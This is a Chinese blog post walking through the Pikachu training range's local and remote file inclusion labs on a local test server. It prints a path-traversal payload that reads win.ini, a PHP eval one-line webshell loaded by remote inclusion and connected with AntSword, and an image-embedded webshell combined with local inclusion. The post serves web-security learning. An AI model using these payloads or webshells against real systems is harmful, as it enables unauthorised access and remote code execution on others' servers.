pikachu靶场关于文件包函漏洞的描述

已于 2022-04-06 10:18:00 修改
阅读量2.3k 收藏 1
点赞数
分类专栏: Web安全初学 文章标签: 安全
于 2022-04-06 10:16:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46208236/article/details/123983510
版权

file inclusion(local)

在这里插入图片描述

正常点击下拉单选框会要求你选择球星并输出他们的个人信息

查看url发现如下:

http://127.0.0.1/Cyberspace/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

其中通过GET方式传参传入的为file1.php

其他几位球星则分别是file1.php~~file5.php,那么针对这个情况进行1-100的数字爆破

发现file6.php有问题

在这里插入图片描述

其他的就有报错了

在这里插入图片描述

通过报错信息可以确认服务器操作系统为Windows,以及网站根目录所在的位置

源代码是这么写的:

$html='';
if(isset($_GET['submit']) && $_GET['filename']!=null){
    $filename=$_GET['filename'];
    include "include/$filename";//变量传进来直接包含,没做任何的安全限制
//     //安全的写法,使用白名单,严格指定包含的文件名
//     if($filename=='file1.php' || $filename=='file2.php' || $filename=='file3.php' || $filename=='file4.php' || $filename=='file5.php'){
//         include "include/$filename";

//     }
}

genjudalao给出的WP,构建payload

http://127.0.0.1/Cyberspace/pikachu/vul/fileinclude/fi_local.php?filename=../../../../../../windows/win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

可以查看win.ini的信息

在这里插入图片描述

当然如果有Webshell的话可以用这种方法进行连接

fileinclusion(remote)

题面就不放图了,和上一题一样

远程文件包含漏洞,同上一道题一样,在这里看一下传入的url,比如说我们传入的是file1.php

http://127.0.0.1/Cyberspace/pikachu/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

既然如此,不难看出这里的GET传参中整个include函数所使用的参数都被展示出来了,那么是不是就可以直接访问web中的文件了?那么就在本地服务器中写一个php一句话木马并命名为2.txt,内容:

<?php @eval($_POST['key']); ?>

然后使用python自带的SocketServer开启服务(这也是看WP新get到的技能)(在这里使用的目录为钢刺啊编写好了的Webshell所在的目录)

在这里插入图片描述

接下来编辑payload

http://127.0.0.1/Cyberspace/pikachu/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1:8081/2.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

post过去个key试试?

在这里插入图片描述

成功起到了Webshell的作用

那还愣着干什么,拔出蚁剑,砍他!!!!!!

在这里插入图片描述

在这里插入图片描述

乌拉~~~

关于本地远程文件包含这边提一下文件上传漏洞一处的做法

getimagesize()

还是一个文件上传的题目

看了眼提示,我去查了一下getimagesize()函数的用法,发现是这样的:

<?php
list($width, $height, $type, $attr) = getimagesize("runoob-logo.png");
echo "宽度为:" . $width;
echo "高度为:" . $height;
echo "类型为:" . $type;
echo "属性:" . $attr;
?>

可以获取目标图片文件的一系列属性,那么我们上传的就必须是一个图片文件,那么就制作图片马

在这里插入图片描述
在这里插入图片描述

其中的new.jpg为图片马

在这里插入图片描述

上传成功,路径为:uploads/2022/01/19/12419861e811fda1ca7328740305.jpg

接下来使用本地文件包含漏洞

在这里插入图片描述

根据url判断相对地址,构建payload

http://127.0.0.1/Cyberspace/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2022/01/21/94950961ea505a86cca496020197.jpg&submit=%E6%8F%90%E4%BA%A4

2022.3.30补充

之前一直使用/b的形式生成图片马,结果会导致其中的<?中的<无法被解析出来从而导致失败。所以在这边使用/a使用ascii编码的方式进行再次尝试。

在这里插入图片描述

看这边,这不就成了?????

在这里插入图片描述

在这里插入图片描述

看这张图更加可以确定是被解析出来了

小龙有点懵
关注
专栏目录
【网络安全】基于PHPStudy的pikachu靶场下载安装详细教程
等风来
04-18 915
PHPStudy的下载安装教程本文略过。若页面回显如上图,说明站点搭建成功。解压到phpstudy的www目录下,接着在浏览器访问该链接
pikachu靶场 :六、文件包含漏洞
qq_43233085的博客
02-01 1417
pikachu靶场 :六、文件包含漏洞 概述本地文件包含漏洞远程文件包含漏洞 概述 文件包含,是一个功能。 在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到...
pikachu靶场 文件包含漏洞解析 file inclusion
weixin_44023442的博客
02-03 551
1、File Inclusion(local) 任意选择NBA player,页面显示如下: 其url直接暴露了查询信息,简单的直接修改: ?filename=../fileinclude&submit=提交查询 说明存在文件包含漏洞(当然实际情况也有可能是:该文件不在过滤范围之内。) 测试能否使用伪协议 ?filename=file:../fileinclude.php&submit=提交查询 测试能否使用http://,php://等协议 ?filename=https://www
web渗透测试----9、命令执行漏洞
七天
01-18 1802
文章目录一、简介二、举例说明三、PHP命令执行实例一:命令执行实例二:代码执行实例三:动态函数调用实例四:PHP函数代码执行漏洞四、Java命令执行五、常见注入方式六、常见无回显的利用方式6.1、使用时间延迟检测无回显命令注入6.2、通过重定向输出来进行无回显命令注入6.3、利用带外通道技术(OOB)6.4、bash反弹shell七、防御附件:一些常见语言的危险函数 一、简介 命令注入漏洞通常是通过注入恶意的命令参数,拼接原本正常的命令语句,达到执行恶意命令目的的一类漏洞。 系统命令是可以连接执行的,在没
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4686
二、代码分析 三、sqlmap测时间注入
命令执行漏洞原理与利用
金色%夕阳的博客
04-30 1186
命令执行漏洞原理与利用 1 命令执行漏洞概述 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。 而应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 远程命令执行漏洞(RCE)是指可以在仅有远程访问权
Pikachu靶场-文件包含漏洞
qq_53083285的博客
11-20 749
pikachu靶场文件包含漏洞文件包含漏洞概述本地文件包含漏洞测试远程文件包含漏洞测试文件包含漏洞文件上传漏洞的利用文件包含漏洞常见防范措施 文件包含漏洞概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的
pikachu靶场包含网络安全中常见的漏洞
11-08
Pikachu靶场中,你可以探索如何利用文件包含漏洞,以及如何避免此类问题,比如禁止动态包含,使用白名单过滤,限制包含文件的来源等。 6. **远程执行**:远程执行漏洞通常允许攻击者在目标系统上执行任意命令,其...
pikachu靶场,可用于web渗透练习
05-19
1. **基础漏洞**:Pikachu靶场涵盖了常见的Web漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等。通过这些挑战,用户可以学习到如何识别和利用这些漏洞。 2. **认证与授权**:靶场中可能包含对用户认证和权限...
演示远程文件包含漏洞
最新发布
QYbkx974的博客
11-21 194
通过pikachu靶场演示远程文件包含漏洞首先php.ini文件下的要等于On, 这样就代表PHP 允许通过 URL 的形式,从远程服务器 包含和执行 PHP 文件
文件包含漏洞
zhengyoulonga的博客
08-04 723
文件包含漏洞
【Web安全从入门到放弃】11_目录遍历和敏感信息泄露漏洞
xhxtalent的博客
12-16 2656
11_目录遍历和敏感信息泄露漏洞 目录遍历漏洞概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。 在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过“…/”这样的手段让后台打开或者执行一些其他的文件。从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞。 看到这里,你可能会觉得目录遍历漏洞和不安全文件下载,甚至
解决表单重复提交
WEBCODE
05-08 96
解决表单重复提交 这应该是个很长久的问题……长久得在网上一搜大把解决方案,就是关于如何防止表单重复提交的问题,而paperen这里也就再来解析一下解决的方法与原理,毕竟也是一个实用的技 术。如果您已经知道如何解决的话那么这篇文章可能不适合你的口味,paperen这里也打算从基础开始讨论,所以希望一步看到解决方案的您也可能不太适合,所以请注意。So~开始吧 ~ paperen想您...
Web漏洞文件包含漏洞
zkaqlaoniao的博客
10-28 7045
公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 一、文件包含漏洞概述 1、漏洞介绍 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚.
UEFI-dsc.dec.fdf文件
m0_49918601的博客
09-10 711
UEFI-dsc.dec.fdf文件   上一篇介绍了 .inf文件, .inf文件相当于Visual Studio中的工程文件。而 .dsc(Platform Description File)则相当于Visual Studio中的 solution 文件。每个包都要包含一个.dec(Package Declaration File)文件、一个 .dsc文件。如果这个包还用于固件Iamge或Option Rom Image的生成,则还需要添加 .fdf(Flash Description File)文件.
pikachu文件包含漏洞
weixin_51446936的博客
06-09 2190
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
Pikachu靶场文件包含漏洞详解
m0_46467017的博客
05-19 7011
Pikachu靶场文件包含漏洞详解前言文件包含漏洞简述1.漏洞描述2.漏洞原因3.漏洞危害4.如何防御第一关 File Inclusion(local)1.尝试读取"隐藏"文件2.读取不同文件文件3.读取系统文件4.结合文件上传getshell第二关 File Inclusion(remote)包含写木马的文件 前言 本篇文章用于巩固对自己文件包含漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列) 链接: 【
Pikachu靶场通关之文件上传
似水流年
01-04 2923
Pikachu靶场通关之文件上传 1、文件上传漏洞概述 不安全文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。 所以,在设计文件上传功能时,一定要对传进来
pikachu靶场文件包含
10-20
pikachu靶场是一个适用于新手学习WEB安全时练习使用的开源靶场,其中包含了文件包含漏洞文件包含漏洞是指在程序中使用了用户可控的文件名或路径,攻击者可以通过构造特定的文件名或路径来读取或执行任意文件,从而实现攻击。在pikachu靶场中,你可以通过模拟攻击来学习如何发现和利用文件包含漏洞,以及如何防范这种漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小龙有点懵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值